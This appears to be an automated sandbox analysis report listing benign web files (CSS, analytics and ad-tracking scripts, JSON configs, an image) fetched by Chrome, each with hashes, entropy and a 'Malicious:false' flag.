                                                                                                                                                                                                                                                                                                                                                                          Preview:@import "https://fonts.googleapis.com/css?family=Inter+Tight:100,200,300,400,500,600,700,800,900";.row-fluid{width:100%;*zoom:1}.row-fluid:after,.row-fluid:before{content:"";display:table}.row-fluid:after{clear:both}.row-fluid [class*=span]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;box-sizing:border-box;display:block;float:left;margin-left:2.127659574%;*margin-left:2.0744680846382977%;min-height:28px;width:100%}.row-fluid [class*=span]:first-child{margin-left:0}.row-fluid .span12{width:99.99999998999999%;*width:99.94680850063828%}.row-fluid .span11{width:91.489361693%;*width:91.4361702036383%}.row-fluid .span10{width:82.97872339599999%;*width:82.92553190663828%}.row-fluid .span9{width:74.468085099%;*width:74.4148936096383%}.row-fluid .span8{width:65.95744680199999%;*width:65.90425531263828%}.row-fluid .span7{width:57.446808505%;*width:57.3936170156383%}.row-fluid .span6{width:48.93617020799999%;*width:48.88297871863829%}.row-fluid .span5{width:4
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, truncated
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):27
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.169382490786664
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:Ftt4ipq4Wln:XtrxWl
                                                                                                                                                                                                                                                                                                                                                                          MD5:8C843FFB840DECAC646424269B22D78B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:823D50FAA2E9D2D75CAEC02C2595C953F165F956
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CF5E566DC08016A63E1667A2726699C3ADE378330F8E073CC4632D0D19B9F51E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C0C1F5624728CDBC57F55C77F6D59C53584F74731A25B8C2EC7C8CCE72725C7AB7A1E1266A8940F19E6C018D3E4A6FA36602987E7EC3680CFFE501A44289070C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pixel-config.reddit.com/pixels/a2_dy5o8mn2d6oc/config
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........................
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1934), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1934
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.98338924175476
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:BiLOQK04tXKTPJmyOk7S+ftxdtAXREbVO8o03PtpxVo7YgVsTQ/WYqlrmufpc+To:MB7ZSm70P0/tpxoCi6lrJRc+t9ZeTdn
                                                                                                                                                                                                                                                                                                                                                                          MD5:350564E02A1F081BB16171BF2C9A10A4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B70F77268B43925D62AB6354A9B377CBF0BFB475
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FCEF96BD3D8479BD51214EA2308B44862E719474C22C78361E02E6546156C96F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3A3AADED8A57A9833AFFF01D32112B577A2DDFCAD880617940B244C31EF385EB232FD56A7E15A2473FDD58ADB686C9FDE91373D022E5F39FA98353F40667E055
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hs-fs/hub/6834707/hub_generated/template_assets/24340422591/1579892512031/Marketplace/Inbound_Pixels/Inspire/Coded_Files/reset.min.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inheri
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (12116)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12208
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.322233629666089
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:ypoEnxEg+b7UPfVjrPimqafYizqlfRsYiqvt1RqEy2H2HBcSjENdVGyhVobFzc12:ypDxXq7UXVjr6mqMzq+qvFqEy2H2OSjR
                                                                                                                                                                                                                                                                                                                                                                          MD5:3EF0DEDA0631561665E95645DAF500A2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9ABF2E44065B0AD3E0E2ED0EF9678E3CC92DEBA7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:42C7E51D284CD7256CAF3BFEBF641141876657EA0D6E5588AC7E69DCE1E9CF7E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C7DC8E5BDB466DC5305A833A7F2AD49ED7A60CC5B50A24373FF1BF63E96D1455192C990A8EF2B9B36EE9151F0791511D3974547A313900F89AF6B0C34D83F71B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hs/hsstatic/HubspotToolsMenu/static-1.354/js/index.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(e){var t={};function n(s){if(t[s])return t[s].exports;var o=t[s]={i:s,l:!1,exports:{}};e[s].call(o.exports,o,o.exports,n);o.l=!0;return o.exports}n.m=e;n.c=t;n.d=function(e,t,s){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:s})};n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"});Object.defineProperty(e,"__esModule",{value:!0})};n.t=function(e,t){1&t&&(e=n(e));if(8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var s=Object.create(null);n.r(s);Object.defineProperty(s,"default",{enumerable:!0,value:e});if(2&t&&"string"!=typeof e)for(var o in e)n.d(s,o,function(t){return e[t]}.bind(null,o));return s};n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};n.d(t,"a",t);return t};n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)};n.p="//static.hsappstatic.net/HubspotToolsMenu/static-1.354/";n(n.s=3)}([function(e,t){e.exports="//static
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=4, orientation=upper-left, software=Google], baseline, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):29882
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.818283395365702
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:f0uxM+qrZYmnb7DmWaAI8TatKPy/BNsF+7wTpcGb333333pAP:f0uxM+qrambOfuwp/B2gwTpcGb333330
                                                                                                                                                                                                                                                                                                                                                                          MD5:7F2DF7635CF0C65215F1D7B06121B830
                                                                                                                                                                                                                                                                                                                                                                          SHA1:46C3341E3CF36405A6A1284573D2C1A475791F5C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7C2894035A97E01D6B6BBEA2528887D30E1766E50B0A22CDD10F68131E924CFD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5044359F7975CEDFC8AD503D7A9BCEC7DE5CFA296A955073DFD12EFC0950BC6FD0B668DF2410295F8017F79269130D989198539DBA6411C428209D4443454852
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:......JFIF.....`.`.....xExif..II*...................1.......>...............i.......F.......Google............0220........@...........@..........C....................................................................C.......................................................................@.@.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......j...H..k.:..o.j..%..d}.&HfQ.!..W..........o.....;T..C....?.h..K=~sF..W.....fi..f-K..KIYY5m,~[.]..f...k........|...?.[....../.>...9...o.....;_.;}..._Y....#.?.....?..3~....O.Q.....s..B.=?.C...h.....9..-....C...k.ko..}..../..O.........3~..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):22537
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.532860985165806
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:4qEMQl6FtO53n+8svyf53Fo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qEMQlwOFn+DCFoeeFqYt2TJisnC6ZcU
                                                                                                                                                                                                                                                                                                                                                                          MD5:38D4F310E650C3877EB2E2C55860F77B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:41D2F4BD61DF909B531BF54EC54AB66CFC8712CC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C6F4951F54B1F8F2F57A668518D6EBC3D94ABF1A1A1ACA440DE486B13D02D85D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:037D0A44AD44D3934029F40997165FB3F690D0C5804BF8EFBD1DC4928258A963D6F7B60D761C17E1BFE581EEEF9C58C58C6E85BF983E4203165F61939FBEE440
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tpc.googlesyndication.com/pagead/js/r20241009/r20110914/client/qs_click_protection_fy2021.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):17174
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.018511771173913
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:PVOH8kB1dW0HNUstXKjX4mXs/0ZBTu+ucqHVrbmg/0E:P1YtNUQXfaS+ucqHVrF0E
                                                                                                                                                                                                                                                                                                                                                                          MD5:A70CC79F6A67585C8736D6B09FD0A34F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:069213AA7B937B61D8D30A7070E4730418D39EF5
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C6F78C76CDD5319852D597CF6644534DE367392FD4A591358C04E2AC1CB1F653
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F9A0F9570F5DE9FE0F6EB4880E423AF28D8BDF9486FF3DD02E507AFBC235D525E8AD1AAF846CADFEF7F4C871C415A599F346F91C226DB34A9A12496E6540E718
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"sodar_query_id":"jeAMZ_D0LJ3Jx_AP4-6quA8","injector_basename":"sodar2","bg_hash_basename":"-DbLkJJK3YZOSOasYi6rcjkBM_N5vpNI48728xD2bD8","bg_binary":"LlIZDJBHFbiHMHwjk/x1Kn92sMauQgGG60jC+7MK4/czWYK0gv7qx52S22M+NQ4TKdb9DyD8W5UeNtt+5A4Dv0WGFH6u6Igu2h6ZVAW0ogVg/Btk2fgFk6daKhul0Q4OR/PyDNEfhgqbzFeDtaOd8mu0UInl1H2PMEWgu+OUrgoKP1RBEtvq+Cq5qHDukL6pPdMeuvKmIrq8O5DBt1wW+BeoWT3MKlM6Jujx5Xl7jFYjCsJw0dX7dSmTULgF74yuJ54UlAGTHVw0WpGcBLjJpGwarWhYSmBXm3TcWfLFkyVW0m28sSDHRncJ1cHHfyjv5UsS6zPnFjDKcG4NHq/KMniDL/c/ERrSj1sziIjlejgJWxg/3Qn0pRwN6viLHOskZpEY3tKNo7kbg2wInxnm3IJe3/HQmdd93+pZHgSI/rU+1D986SO0tP3te0fAKLjGNy38VR9M6p/iu57FJDtaUNxlJxkTJNSzPAkk6qbwZ8yQEpcdf1Sxpn3EuuvMuS5G1sxkwJKfsPQQwIs+7dz7U9FpKonUPt6WgG/acAYH6Eg5rSzOm/TvTg11zyHe9j/nAbaI7N5WwyHkryRt37kcemDhyCwD5iYmbHZBVW2JzAnaEiIOilQGQgshqLVCxkLniBk4GldYrc5B0wBZ7/dPSQTHzqXhcMzc0/N6OnObIhs3kVdAuweJgIWOxuOGyLZ9/30KdqYQ5IJHQG58sUR94+Rb4qVqtjbkBGx4nlpxlNuzUSwcc6DPAcIK7TLbRmddPbKiFA67j1lo653ugKhoJwYlEkI4kRHoutnn4kYP4KF6kIDiZ8vhqCMDWCwIxYooWet7T7XkIDHS1uh79
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):135
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.936163260345646
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YVKBEivEXoMRL2KIhfwcP2xR2GXEqRWJ6jLZHJqCUXPTY:YihgbU2mn6jLZp3SU
                                                                                                                                                                                                                                                                                                                                                                          MD5:8AA89D38A2211D124A514A95BF9B8D85
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3159B0509A1C4EC4335152271FC6E85B26CAF6E4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5290C77870302BFFEE5B30D68B9F14869CA04C1AF0E6D1BA3D63DD52613494B9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9CD4F95ABDA664C2D807DE67F9980FED2559AE12D46AB879EB9E0522FF41D03795F4A74A6EFCABD7B9C8E47E4A74EB63FC06B1ECE825171D0AF937A3527FD740
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://forms.hscollectedforms.net/collected-forms/v1/config/json?portalId=6834707&utk=1ad7ee3b723d214336417ad5b634063c
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"portalId":6834707,"submissionsApiDomain":"forms.hubspot.com","reportScraperTest":false,"formCaptureEnabled":true,"token":-1954512136}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):250
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.079255168840599
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:YLzzWUJnwALXZfvuJdxLNwALXZ1TL+Y2wALXZfTzmKrofY:YLfWUwaItNwazTyY2waJmDw
                                                                                                                                                                                                                                                                                                                                                                          MD5:6399958774A02FF100F1C07B19B4EF1C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4D762F2573E752847B0E97FB094B31C96D6F11F6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:16528857EF3B22B0B99058388A2DB35E7A0A9CB2D03EABDEDFB81500B2F04530
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:64505BC2A0890282695E251A7B014D3C0A0F23C9350DD6F95729EF0CCE7C6A41902B54144110B1017B43FCF67E878A1842BD5A2ADD76486D759DD81F965E0F42
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"pixels":{"ADWORDS":[{"pixelId":"927141988","limitedDataUseEnabled":false}],"FACEBOOK":[{"pixelId":"283945248938426","limitedDataUseEnabled":true}],"LINKEDIN":[{"pixelId":"48411","limitedDataUseEnabled":false}]},"enhancedConversionEventSettings":{}}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (53672)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):54976
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.736266810899142
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:jvaDmGd1Rq6wmiHaiTc1kC1xWKG29lMF3Px810K2LtaSG11aeBpXzbP8hP7E:jvaDmC19wmbSCjpG29KFiXLpXzB
                                                                                                                                                                                                                                                                                                                                                                          MD5:49A2FCF87A0AEC31C432E04F35AD6094
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7FAE0059C1CD8C04BE2EC7A8ECDC712730D26704
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3FFD2E0331C96FFCCB313B388D093D3E0A083AA7F6F7EF9E09EA3BD44536B002
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:814CB4CB5A54FCE13F4D1FB693CCE3A88ACBA1A3F867BC7F85AEB1E06175A4F78E5D4DB02C7E412F018D5DD2BE78C17B43C62523ABC0A6CD1101B568DD348E8E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function l(I){return I}var M=function(I,w,d,k,X,A,B,m,u,Y,Q,S){for(Q=(Y=75,63);;)try{if(Y==k)break;else{if(Y==d)return Q=63,m;if(Y==15)Y=K.console?w:d;else if(Y==75)m=B,u=K.trustedTypes,Y=72;else if(Y==72)Y=u&&u.createPolicy?I:0;else if(Y==I)Q=68,m=u.createPolicy(A,{createHTML:J,createScript:J,createScriptURL:J}),Y=d;else if(Y==7)Q=63,Y=15;else if(Y==w)K.console[X](S.message),Y=d;else if(Y==0)return m}}catch(N){if(Q==63)throw N;Q==68&&(S=N,Y=7)}},J=function(I){return l.call(this,I)},K=this||self;(0,eval)(function(I,w){return(w=M(54,17,30,16,"error","bg",null))&&I.eval(w.createScript("1"))===1?function(d){return w.createScript(d)}:function(d){return""+d}}(K)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:applicatio
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.321928094887362
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:v:v
                                                                                                                                                                                                                                                                                                                                                                          MD5:41C068B2F6D1CCFE3F227223FF489C1E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4CB89C07CAC98EBDBF521BBC4C3F6544B63368AA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:21152971983AB0F08638F7BC1619A54EFD4D9F3115FFDEF92C151B9B9D1A109D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7911A56666A48A12D0B08145F7FF80650C42A96AD29EB0F7D113C86EE5FA7EFF72C541CA592D43A561EC9A1AD03F3F3EFD5631FAE86F80ECD427A92EAA1C7B72
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:US-NY
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 43386
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12103
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985508379818304
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:26MV2PEUWRRI2V6SKbQ5W3YmOCf3OrXT9WVc2VhjIJ0STPz03aWagq692yvggkbH:+tjRIm6SoITu3khUTPjI5TI3afb6YmwH
                                                                                                                                                                                                                                                                                                                                                                          MD5:BED9B675380C07EDC84C03D0F362B192
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0FC4DCF8CB37F303985159B5A9348BB9AE5C6397
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3AE25E7FC8C3E9A41A480D9E39BA0E43845FFD78B0529695530925F6575852D9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:25CFA4027E02D6EEFC95202417A02843556BDA5D28685735FFC102F3C63327CFAAF59B9565E3B23F2BC26C0274EFDD0F69CCA8AD9A3A6DCEA4D903722DCE9FB6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.redditstatic.com/ads/pixel.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........;ks.....n..i....k\....<.L..J..P"$F.q....{.%....;;.6.B.}N.w.>.....I.0(E*F.J..t$T=4......yc....J...T.4..%......."\..F......d..%...U52..c+>F..f..JV...... ......."tW>..[.x....L.Q.P.u't..\]wF..w=.._.z....Boi...'.c.FIl<m6M..]u.;..K....F..'.Y.R........AK.M..3.c.N.....D....yf..&...Y2oz......uS..Q.j.]&$...8[.i..6cT..L5.....#..Q.&hj;I.=6I.L.^,F..v;z\&...S4.....N.h...|.].@..D..B.=a..pz.P.....e.5...vQ....G~.fK...2..A.r9ko...ihO...R...[-...}.=.T.39O!.3"....(.....C.....q...8.E..6..*.}..]t.D...'gN.;.2.>....k.+.S)D.....0...".Q.i.,./r.(....Nn.Tmhz.m.Kx]Zj....y.<...;.D.r..H...U....@%.Kb...W.V.{..`i......._...'.!)5.CGd.....e.+^...E.8.Q..d.....4.#...|_.7.UCm..I{.{.f['...`..c:mBjMp......N..F..1.>*. YR...N....~te.B.}n....M..q.<...x.....N:.6.....CT..+^.1........!;...8....P..d+>.q",3..qW.....qb....:....C@ey.$..c.D.e..D...-..<...!......$.d...I`sj.;yplf.....<Y.2I.y.L.Du1".K..... gWn.4.2.....l..0ri....I...Q......X.x.}.?.......A.I..).g.a4.....o..-c
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (11440), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):11440
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.405413454337748
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:TixaOdP2DahLeKkda6nGvCvsojELj2n04UwXNAfLwUW1WuYx6jomrYZJp2XmIR2z:mxaOdWyLwaAWj2nvUwXNAfLwUWAuYx6e
                                                                                                                                                                                                                                                                                                                                                                          MD5:E959FBDD13DEF4B9A9D0A5FC9A7DE4D4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1E39712307E3673B40C0BDB8C7D3E86A3E8B60A0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2DEFE59E357A7D0683C8283AC42841DB404A0884CAE2EAECEBF4B676E559DEDE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:590B22282634411002C9467C6C0D20D27979F841BFFCF893E715A2B61301A873457A9CBE0A765A11592E7F5CB81FC50D5BD436BD5D47DC93BFB776515B02E2C9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://s10.histats.com/js15_as.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var n="undefined",t=function(t){return typeof t!==n},e="js15_as.js",r="",i=!1,o=!1,a=!1,s=!1,c="0.2.1",u=25,_="-",f="_HISTATS_SID",d="histats_custom_destDivProducer",p=function(n){_+="_"+n};p(c);var v=function(){i&&console.log.apply(this,arguments)},l=function(n,r){var i=n||{};try{var o=r.document,a=r.navigator,s=r.screen,c=r.Date,f=r.Math,d=function(){return o},p=function(){return d().getElementsByTagName("body")[0]||d().getElementsByTagName("head")[0]},l=function(n){return"function"==typeof n},h=function(n){return t(n)&&n instanceof Array},m=function(n){return t(n)&&!!d().getElementById(n)},y=function(n){var e=!1;if(t(n)){if("NaN"==parseInt(n))return!1;e=parseInt(n)>0}return e},g=function(n){return y(n)?parseInt(n):0},w=function(n){return"string"!=typeof n||n.length<1?n:n.replace(/^['"]?(.*)['"]$/,"$1")},T=t(window["_DEBUG_HISTATS_ASYNCR_DO_NOT_AUTOSTART"]),I=function(){return parseInt(1e4*f.random())+1},H=function(){return Math.floor(4e8*Math.random())-2e8},C=I(),E="hist
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1327)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1369
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.790302563475718
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:4u/SZOZHEPJ/popJzwxI0kATpL4HNrreVx:4qTEJMJzyuKx
                                                                                                                                                                                                                                                                                                                                                                          MD5:6A62AD0F300504C583E7797C79C2D8AB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E6E4F113FC2D008516D21228DAC93BB6A2FCBB53
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:50AD448A8A5720BF8A5617DB15AF31AE60163DE06331576F60C6244C012FFC72
